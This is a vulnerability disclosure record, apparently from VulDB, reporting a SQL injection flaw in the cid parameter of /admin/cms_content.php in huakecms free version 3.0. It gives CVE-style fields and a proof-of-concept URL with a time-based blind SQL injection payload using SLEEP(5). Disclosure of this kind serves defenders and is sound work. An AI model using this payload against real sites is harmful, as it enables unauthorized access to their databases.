Submission #210340: huakecms free version3.0 was discovered to contain SQL injection vulnerability (info)

Title: huakecms free version3.0 was discovered to contain SQL injection vulnerability

Description: 华科网站管理系统免费版3.0 (huakecms free version 3.0) is a set of intelligent website building software based on PHP! The product has the characteristics of a novel and beautiful interface, dynamic and fashionable, etc. It is a CMS content management system serving small and medium-sized enterprises. The threshold for using the software is low, no professional computer knowledge is required, full back-end operation management, simple operation and powerful functions, and the software also has extremely strong scalability and can adapt to the different needs of various industries.

[Suggested description] huakecms free version 3.0 was discovered to contain a SQL injection vulnerability in /admin/cms_content.php
[Vulnerability Type] SQL INJECTION
[Vendor of Product] http://www.huakecms.com/
[Affected Product Code Base] huakecms free version Dev 3.0
[Affected Component] File: /admin/cms_content.php Parameter: cid
[Attack Type] Remote
[poc] http://localhost:8086/admin/cms_content.php?key=t&type=&search=%E7%BB%BC%E5%90%88%E6%9D%A1%E4%BB%B6%E6%9F%A5%E8%AF%A2&cid=1 AND (SELECT 3158 FROM (SELECT(SLEEP(5)))YkeQ)
Source: https://github.com/yhy217/huakecms-vul/issues/1
User: jamspilly (UID 54414)
Submitted: 2023-09-19 07:00 (3 years ago)
Moderation: 2023-09-29 07:38 (10 days later)
Status: Accepted
VulDB entry: 240877 [huakecms 3.0 /admin/cms_content.php cid SQL injection]
Points: 20
